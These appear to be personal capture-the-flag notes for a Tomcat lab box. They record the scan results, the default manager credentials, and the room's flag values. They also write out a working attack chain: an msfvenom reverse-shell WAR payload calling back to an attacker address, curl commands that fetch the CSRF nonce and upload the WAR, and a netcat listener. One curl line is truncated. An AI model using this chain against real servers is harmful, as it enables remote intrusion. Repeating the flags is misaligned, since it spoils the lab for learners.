THM - Thompson
Date - 22nd August 2025
Target IP - 10.201.0.177

OPEN PORTS :- Nmap
22/tcp   open  ssh     OpenSSH 7.2p2
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 8.5.5

Port Used :- 8080/tcp

Accessible :- Using Curl (HTML Code)
http://10.201.0.177:8080 - Main Page
http://10.201.0.177:8080/manager/status - Server Status Page
http://10.201.0.177:8080/manager/html - Manager App
http://10.201.0.177:8080/host-manager/html - Host Manager 

Credentials :-
Username - tomcat
Password - s3cret

Exploitation :- 
Creating War File - msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.25.212 LPORT=2222 -f war -o shell.war

Getting Key - curl -u tomcat:s3cret -c cookies.txt "http://10.201.0.177:8080/manager/html" | grep -o 'CSRF_NONCE=

Uploading War File - curl -u tomcat:s3cret -b cookies.txt -F "deployWar=@shell.war" "http://10.201.0.177:8080/manager/html/upload;jsessionid=9EF9E6014D09F3D7FB52C56ED4C0139B?org.apache.catalina.filters.CSRF_NONCE=4124316A8E1B2F0822BD6D04CD15D2A0"

Activating the War File - curl http://10.201.0.177/shell/

Running Backdoor - nc -nvlp 2222

FLAGS :- 
user.txt - 39400c90bc683a41a8935e4719f181bf
root.txt - d89d5391984c0450a95497153ae7ca3a
